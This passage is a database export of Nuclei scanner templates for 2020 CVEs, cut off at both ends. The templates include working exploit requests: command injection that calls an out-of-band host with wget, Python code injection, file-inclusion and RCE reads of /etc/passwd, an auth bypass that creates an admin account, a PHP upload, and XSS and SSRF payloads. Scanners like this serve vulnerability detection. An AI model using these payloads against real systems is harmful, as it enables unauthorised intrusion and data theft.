-----------------------------350278735926454076983690555601\n Content-Disposition: form-data; name=\"type\"\n\n click\n -----------------------------350278735926454076983690555601\n Content-Disposition: form-data; name=\"upload-file\"; filename=\"{{randstr}}.txt%\"\n Content-Type: application/x-httpd-php\n\n CVE-2020-12800-{{randstr}}\n -----------------------------350278735926454076983690555601--\n - |\n GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_2\n words:\n - \"CVE-2020-12800-{{randstr}}\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022014f2c6293b5487344a5211f24394c32eaa0ba6ccb85df0f909313b3a02f980f602202a0cd67991ee177b7b5e7d576271960799fe9c738787a0cd09fb2d5f79319ca0:922c64590222798bb761d5b6d8e72950", "hash": "b69e0b5126a7a0efa11bf1b6a24997e5", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30817e" }, "name": "CVE-2020-13117.yaml", "content": "id: CVE-2020-13117\n\ninfo:\n name: Wavlink Multiple AP - Remote Command Injection\n author: gy741\n severity: critical\n description: Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized which allows command injection via the \"key\" parameter in a login request. 
It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may also be affected.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the affected device.\n remediation: |\n Apply the latest firmware update provided by the vendor to mitigate this vulnerability.\n reference:\n - https://blog.0xlabs.com/2021/02/wavlink-rce-CVE-2020-13117.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-13117\n - https://github.com/20142995/sectool\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-13117\n cwe-id: CWE-77\n epss-score: 0.07866\n epss-percentile: 0.94083\n cpe: cpe:2.3:o:wavlink:wn575a4_firmware:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wavlink\n product: wn575a4_firmware\n shodan-query: http.title:\"Wi-Fi APP Login\"\n tags: cve,cve2020,wavlink,rce,oast,router\n\nhttp:\n - raw:\n - |\n POST /cgi-bin/login.cgi HTTP/1.1\n Host: {{Hostname}}\n Origin: http://{{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n Accept-Encoding: gzip, deflate\n\n newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: word\n part: body\n words:\n - \"parent.location.replace\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d359f7dda8bb47704e25df9f6ccae4b6c5ae50d87a2f8d96862170e8a3fae74b022100cc9091e18385d3d1fe499c692c8b9095062aaa9ea0f09ddb06e82dede501eb36:922c64590222798bb761d5b6d8e72950", "hash": "bcb56d3f7a71b7a3eba1f7e23bfacdcc", 
"level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30817f" }, "name": "CVE-2020-13121.yaml", "content": "id: CVE-2020-13121\n\ninfo:\n name: Submitty <= 20.04.01 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: Submitty through 20.04.01 contains an open redirect vulnerability via authentication/login?old= during an invalid login attempt. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks.\n remediation: |\n Upgrade to Submitty version 20.04.01 or later to fix the open redirect vulnerability.\n reference:\n - https://github.com/Submitty/Submitty/issues/5265\n - https://nvd.nist.gov/vuln/detail/CVE-2020-13121\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-13121\n cwe-id: CWE-601\n epss-score: 0.00235\n epss-percentile: 0.60944\n cpe: cpe:2.3:a:rcos:submitty:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: rcos\n product: submitty\n tags: cve,cve2020,redirect,submitty,oos,rcos\n\nhttp:\n - raw:\n - |\n POST /authentication/check_login?old=http%253A%252F%252Fexample.com%252Fhome HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Referer: {{RootURL}}/authentication/login\n\n user_id={{username}}&password={{password}}&stay_logged_in=on&login=Login\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 
4a0a0047304502206f176277eec35ef135b67c205d1cdacbf6a6d6a914b0330fc921447e4d77f10a022100d548e0e86bb67accdbea62a2cb11ff6fdfd956cb47edb0909e50b0bb2324b033:922c64590222798bb761d5b6d8e72950", "hash": "2d38d20933d0019d01cfdff74d58e901", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308180" }, "name": "CVE-2020-13158.yaml", "content": "id: CVE-2020-13158\n\ninfo:\n name: Artica Proxy Community Edition <4.30.000000 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: Artica Proxy Community Edition before 4.30.000000 is vulnerable to local file inclusion via the fw.progrss.details.php popup parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, potentially leading to further compromise of the system.\n remediation: |\n Upgrade to Artica Proxy Community Edition version 4.30.000000 or later to fix the Local File Inclusion vulnerability.\n reference:\n - https://github.com/InfoSec4Fun/CVE-2020-13158\n - https://sourceforge.net/projects/artica-squid/files/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-13158\n - https://github.com/nomi-sec/PoC-in-GitHub\n - https://github.com/soosmile/POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-13158\n cwe-id: CWE-22\n epss-score: 0.96791\n epss-percentile: 0.99659\n cpe: cpe:2.3:a:articatech:artica_proxy:*:*:*:*:community:*:*:*\n metadata:\n max-request: 1\n vendor: articatech\n product: artica_proxy\n tags: cve,cve2020,artica,lfi,articatech\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 
490a0046304402205aa5e4fc4a2fc1a974f36ab4c73ca7f8d970a1a6bd7e14394f238fa34179b721022061838c49e3fa2d0486bfc7a85f72858cbe25daf49758350e33522632ea43a507:922c64590222798bb761d5b6d8e72950", "hash": "7464fadb59c4cbde196c611a0fbe0de3", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308181" }, "name": "CVE-2020-13167.yaml", "content": "id: CVE-2020-13167\n\ninfo:\n name: Netsweeper <=6.4.3 - Python Code Injection\n author: dwisiswant0\n severity: critical\n description: |\n Netsweeper through 6.4.3 allows unauthenticated remote code execution because webadmin/tools/unixlogin.php (with certain Referer headers) launches a command line with client-supplied parameters, and allows injection of shell metacharacters.\n impact: |\n Successful exploitation of this vulnerability can lead to remote code execution, compromising the affected system.\n remediation: |\n Upgrade to a patched version of Netsweeper (>=6.4.4) to mitigate this vulnerability.\n reference:\n - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/\n - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says\n - https://nvd.nist.gov/vuln/detail/CVE-2020-13167\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-13167\n cwe-id: CWE-78\n epss-score: 0.97405\n epss-percentile: 0.99917\n cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: netsweeper\n product: netsweeper\n tags: cve2020,cve,netsweeper,rce,python,webadmin\nvariables:\n rand_str: \"{{randstr}}\"\n cmd: 'echo \"{{base64(rand_str)}}\" | base64 -d > /usr/local/netsweeper/webadmin/out'\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%27{{url_encode(hex_encode(cmd))}}%27.decode%28%27hex%27%29%29%23&timeout=5\"\n - \"{{BaseURL}}/webadmin/out\"\n\n 
headers:\n Referer: \"{{BaseURL}}/webadmin/admin/service_manager_data.php\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_2\n words:\n - \"{{rand_str}}\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221008c62562d86e9062675832a60abae347f5564380cd4d1f3143a04618fc023ca9a022100c69d9b44376226c036805afae776400ac22ff3adc49ae438eefea5c81b5aac9a:922c64590222798bb761d5b6d8e72950", "hash": "b2b30d3d7206a2386e4fd56fc9b97e4c", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308182" }, "name": "CVE-2020-13258.yaml", "content": "id: CVE-2020-13258\n\ninfo:\n name: Contentful <=2020-05-21 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: |\n Contentful through 2020-05-21 for Python contains a reflected cross-site scripting vulnerability via the api parameter to the-example-app.py.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade Contentful to a version that is not vulnerable to CVE-2020-13258 or apply the necessary patches provided by the vendor.\n reference:\n - https://github.com/contentful/the-example-app.py/issues/44\n - https://nvd.nist.gov/vuln/detail/CVE-2020-13258\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-13258\n cwe-id: CWE-79\n epss-score: 0.00464\n epss-percentile: 0.7492\n cpe: cpe:2.3:a:contentful:python_example:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: contentful\n product: python_example\n tags: cve,cve2020,contentful,xss\n\nhttp:\n - raw:\n - |\n GET /?cda'\"&locale=locale=de-DE HTTP/1.1 HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n 
words:\n - \"{'api': '\"\n - \"',\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022027c5f2643bd4cd615440112890d0d23c6b5ac5613534bf20e9b6c3f6e67fdac90220773833d83834dbacee963a6c0ea63557e73c73e473d68647ce026eb13c287f16:922c64590222798bb761d5b6d8e72950", "hash": "3d02d5754e1ed00df7a224dc29c41d8a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308183" }, "name": "CVE-2020-13379.yaml", "content": "id: CVE-2020-13379\n\ninfo:\n name: Grafana 3.0.1-7.0.1 - Server-Side Request Forgery\n author: Joshua Rogers\n severity: high\n description: |\n Grafana 3.0.1 through 7.0.1 is susceptible to server-side request forgery via the avatar feature, which can lead to remote code execution. Any unauthenticated user/client can make Grafana send HTTP requests to any URL and return its result. This can be used to gain information about the network Grafana is running on, thereby potentially enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n An attacker can exploit this vulnerability to bypass security controls, access internal resources, and potentially perform further attacks.\n remediation: Upgrade to 6.3.4 or higher.\n reference:\n - https://github.com/advisories/GHSA-wc9w-wvq2-ffm9\n - https://github.com/grafana/grafana/commit/ba953be95f0302c2ea80d23f1e5f2c1847365192\n - http://www.openwall.com/lists/oss-security/2020/06/03/4\n - https://nvd.nist.gov/vuln/detail/CVE-2020-13379\n - http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00060.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H\n cvss-score: 8.2\n cve-id: CVE-2020-13379\n cwe-id: CWE-918\n epss-score: 0.76934\n epss-percentile: 0.97935\n cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: 
grafana\n product: grafana\n shodan-query: title:\"Grafana\"\n tags: cve2020,cve,grafana,ssrf\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1\"\n - \"{{BaseURL}}/grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"cloudflare.com\"\n - \"dns\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"image/jpeg\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502205b9bd2aa77748627d7df56b1f9ddb380e47285274318cb1a472d118ac7ea5dab022100e2b67b3e80048d92b7de1e74b9a632e18562312f42d046e47dde1538b01001e1:922c64590222798bb761d5b6d8e72950", "hash": "4f7971d9d0df1ce479057bb6d31683b3", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308184" }, "name": "CVE-2020-13405.yaml", "content": "id: CVE-2020-13405\n\ninfo:\n name: Microweber <1.1.20 - Information Disclosure\n author: ritikchaddha,amit-jd\n severity: high\n description: |\n Microweber before 1.1.20 is susceptible to information disclosure via userfiles/modules/users/controller/controller.php. 
An attacker can disclose the users database via a /modules/ POST request and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to sensitive information.\n remediation: |\n Upgrade Microweber to version 1.1.20 or later to mitigate the vulnerability.\n reference:\n - https://rhinosecuritylabs.com/research/microweber-database-disclosure/\n - https://github.com/microweber/microweber/commit/269320e0e0e06a1785e1a1556da769a34280b7e6\n - https://nvd.nist.gov/vuln/detail/CVE-2020-13405\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-13405\n cwe-id: CWE-306\n epss-score: 0.01002\n epss-percentile: 0.81964\n cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: microweber\n product: microweber\n shodan-query: http.html:\"microweber\"\n tags: cve,cve2020,microweber,unauth,disclosure\n\nhttp:\n - raw:\n - |\n POST /module/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n Referer: {{BaseURL}}admin/view:modules/load_module:users\n\n module={{endpoint}}\n\n payloads:\n endpoint:\n - \"users/controller\"\n - \"modules/users/controller\"\n - \"/modules/users/controller\"\n matchers:\n - type: dsl\n dsl:\n - 'contains(body,\"username\")'\n - 'contains(body,\"password\")'\n - 'contains(body,\"password_reset_hash\")'\n - 'status_code==200'\n - 'contains(header,\"text/html\")'\n condition: and\n# digest: 4a0a0047304502203be4d7f5e6cf689779af0571cd7edda9bf8975e0a39de1da9a717cdacffd438c022100c9e14eb45b1c3245277acdf5ad2abab89ea79fd9fac04a3de2d9acfd1d80f272:922c64590222798bb761d5b6d8e72950", "hash": "09232d6e3b7ef04972ac04c268bd2415", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308185" }, "name": "CVE-2020-13483.yaml", "content": "id: 
CVE-2020-13483\n\ninfo:\n name: Bitrix24 <=20.0.0 - Cross-Site Scripting\n author: pikpikcu,3th1c_yuk1\n severity: medium\n description: The Web Application Firewall in Bitrix24 up to and including 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of Bitrix24 (version >20.0.0) to mitigate this vulnerability.\n reference:\n - https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558\n - https://twitter.com/brutelogic/status/1483073170827628547\n - https://nvd.nist.gov/vuln/detail/CVE-2020-13483\n - https://github.com/afinepl/research\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-13483\n cwe-id: CWE-79\n epss-score: 0.00113\n epss-percentile: 0.43845\n cpe: cpe:2.3:a:bitrix24:bitrix24:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: bitrix24\n product: bitrix24\n tags: cve2020,cve,xss,bitrix,bitrix24\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>'\n - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E'\n\n 
stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '*/)});function __MobileAppList(){alert(1)}//'\n - \"function(handler){};function __MobileAppList(test){alert(document.domain);};//\"\n condition: or\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100c969dd14c4d494d022ccf2ee1851599d1a39f7853ce81508bbd20845162ddd8002205f3fb9d87eb78e066c23780860090f71d04bbfcc09ec204574049849d98b144c:922c64590222798bb761d5b6d8e72950", "hash": "2de027d0ab782114b55113c5bc602396", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308186" }, "name": "CVE-2020-13638.yaml", "content": "id: CVE-2020-13638\n\ninfo:\n name: rConfig 3.9 - Authentication Bypass(Admin Login)\n author: theamanrawat\n severity: critical\n description: |\n lib/crud/userprocess.php in rConfig 3.9.x before 3.9.7 has an authentication bypass, leading to administrator account creation. 
This issue has been fixed in 3.9.7.\n reference:\n - https://www.rconfig.com/downloads/rconfig-3.9.4.zip\n - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-13638\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-13638\n cwe-id: CWE-269\n epss-score: 0.39352\n epss-percentile: 0.97152\n cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: rconfig\n product: rconfig\n shodan-query: http.title:\"rConfig\"\n tags: cve,cve2020,rconfig,auth-bypass,intrusive\nvariables:\n username: \"{{to_lower(rand_text_alpha(5))}}\"\n password: \"{{rand_text_alphanumeric(12)}}!\"\n email: \"{{rand_base(8)}}@{{rand_base(5)}}.com\"\n\nhttp:\n - raw:\n - |\n POST /lib/crud/userprocess.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=01b28e152ee044338224bf647275f8eb\n\n --01b28e152ee044338224bf647275f8eb\n Content-Disposition: form-data; name=\"username\"\n\n {{username}}\n --01b28e152ee044338224bf647275f8eb\n Content-Disposition: form-data; name=\"passconf\"\n\n {{password}}\n --01b28e152ee044338224bf647275f8eb\n Content-Disposition: form-data; name=\"password\"\n\n {{password}}\n --01b28e152ee044338224bf647275f8eb\n Content-Disposition: form-data; name=\"email\"\n\n {{email}}\n --01b28e152ee044338224bf647275f8eb\n Content-Disposition: form-data; name=\"editid\"\n\n\n --01b28e152ee044338224bf647275f8eb\n Content-Disposition: form-data; name=\"add\"\n\n add\n --01b28e152ee044338224bf647275f8eb\n Content-Disposition: form-data; name=\"ulevelid\"\n\n 9\n --01b28e152ee044338224bf647275f8eb--\n - |\n GET /login.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /lib/crud/userprocess.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n user={{username}}&pass={{password}}&sublogin=1\n\n host-redirects: true\n\n matchers-condition: and\n matchers:\n - 
type: word\n part: body_3\n words:\n - \"rConfig - Configuration Management\"\n - \"Logged in as\"\n - \"dashboadFieldSet\"\n condition: and\n\n - type: word\n part: header_3\n words:\n - 'text/html'\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100e7f135f57aac986c270d66ef6afc8f90e89fd565b52145eb6316f4a20da0e4b5022100876e3b9f1953ea0c2910db7241c0c1297552adc50ced66724b0c4758e85e790f:922c64590222798bb761d5b6d8e72950", "hash": "bd3ea9d6468814d337982a658211c392", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308187" }, "name": "CVE-2020-13700.yaml", "content": "id: CVE-2020-13700\n\ninfo:\n name: WordPresss acf-to-rest-api <=3.1.0 - Insecure Direct Object Reference\n author: pikpikcu\n severity: high\n description: |\n WordPresss acf-to-rest-ap through 3.1.0 allows an insecure direct object reference via permalinks manipulation, as demonstrated by a wp-json/acf/v3/options/ request that can read sensitive information in the wp_options table such as the login and pass values.\n impact: |\n An attacker can exploit this vulnerability to access sensitive data, such as user information or administrative credentials.\n remediation: |\n Update the acf-to-rest-api plugin to version >3.1.0 or apply the latest security patches.\n reference:\n - https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5\n - https://wordpress.org/plugins/acf-to-rest-api/#developers\n - https://github.com/airesvsg/acf-to-rest-api\n - https://nvd.nist.gov/vuln/detail/CVE-2020-13700\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-13700\n cwe-id: CWE-639\n epss-score: 0.01831\n epss-percentile: 0.86908\n cpe: cpe:2.3:a:acf_to_rest_api_project:acf_to_rest_api:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: acf_to_rest_api_project\n product: acf_to_rest_api\n framework: wordpress\n tags: cve,cve2020,wordpress,plugin,acf_to_rest_api_project\n\nhttp:\n - 
method: GET\n path:\n - '{{BaseURL}}/wp-json/acf/v3/options/a?id=active&field=plugins'\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - 'Content-Type: application/json'\n\n - type: word\n part: body\n words:\n - 'acf-to-rest-api\\/class-acf-to-rest-api.php'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ede93ae3d2d8a4369c76f47926f8a7bfc48d7b70334665a791cc4bb1f71ee4da0220213c5e3ad599f7bf140e15447a3589c31f7791d3afb2ea66c2570100213bb2c6:922c64590222798bb761d5b6d8e72950", "hash": "7ba545b27591cfddc43cbd730b3bb428", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308188" }, "name": "CVE-2020-13820.yaml", "content": "id: CVE-2020-13820\n\ninfo:\n name: Extreme Management Center 8.4.1.24 - Cross-Site Scripting\n author: tess\n severity: medium\n description: |\n Extreme Management Center 8.4.1.24 contains a cross-site scripting vulnerability via a parameter in a GET request. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. 
This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patch or upgrade to a non-vulnerable version of Extreme Management Center.\n reference:\n - https://medium.com/@0x00crash/xss-reflected-in-extreme-management-center-8-4-1-24-cve-2020-13820-c6febe951219\n - https://gtacknowledge.extremenetworks.com/articles/Solution/000051136\n - https://gtacknowledge.extremenetworks.com\n - https://nvd.nist.gov/vuln/detail/CVE-2020-13820\n - https://documentation.extremenetworks.com/release_notes/netsight/XMC_8.5.0_Release_Notes.pdf\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-13820\n cwe-id: CWE-79\n epss-score: 0.00289\n epss-percentile: 0.65704\n cpe: cpe:2.3:a:extremenetworks:extreme_management_center:8.4.1.24:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: extremenetworks\n product: extreme_management_center\n shodan-query: title:\"Extreme Management Center\"\n tags: cve2020,cve,xss,extremenetworks\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/OneView/view/center?a%27+type%3d+%27text%27+autofocus+onfocus%3d%27alert(document.domain)\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"autofocus onfocus='alert(document.domain)\"\n - \"Extreme Management Center\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402203b2fba8721ad31fdedf35ac64fd1aa9f3daf248c5a28d0e177bc476aef75fc3b02207c1ceaaceaae8e7f5b2fb30ff8a741683dff8b8466099618f50ab7e864979a62:922c64590222798bb761d5b6d8e72950", "hash": "79c3e9f9df0c1f7aa0263c67429e66fa", "level": 4, "time": "2024-05-17 23:39:44" 
}, { "_id": { "$oid": "66477a413521042ccf308189" }, "name": "CVE-2020-13851.yaml", "content": "id: CVE-2020-13851\n\ninfo:\n name: Artica Pandora FMS 7.44 - Remote Code Execution\n author: theamanrawat\n severity: high\n description: |\n Artica Pandora FMS 7.44 allows remote command execution via the events feature.\n reference:\n - https://packetstormsecurity.com/files/158390/Pandora-FMS-7.0-NG-7XX-Remote-Command-Execution.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-13851\n - https://www.coresecurity.com/advisories\n - https://github.com/hadrian3689/pandorafms_7.44\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2020-13851\n cwe-id: CWE-78\n epss-score: 0.96952\n epss-percentile: 0.99674\n cpe: cpe:2.3:a:pandorafms:pandora_fms:7.44:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: pandorafms\n product: pandora_fms\n shodan-query: title:\"Pandora FMS\"\n tags: cve2020,cve,packetstorm,rce,pandora,unauth,artica,pandorafms\n\nhttp:\n - raw:\n - |\n POST /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - 'root:.*:0:0:'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n - \"PHPSESSID=\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022058dede621391a5c5aa3cbab99614f6e05eb1c25d174cb444fc225088cfc531a3022100d43ab48e876ed266cffa72d5a17bcaf610d3d10d131b046556958fd7be786cf1:922c64590222798bb761d5b6d8e72950", "hash": "a911266b08d7fa0e3a91e16b304d452c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30818a" }, "name": "CVE-2020-13927.yaml", "content": "id: CVE-2020-13927\n\ninfo:\n name: Airflow Experimental <1.10.11 - REST API Auth Bypass\n author: pdteam\n severity: 
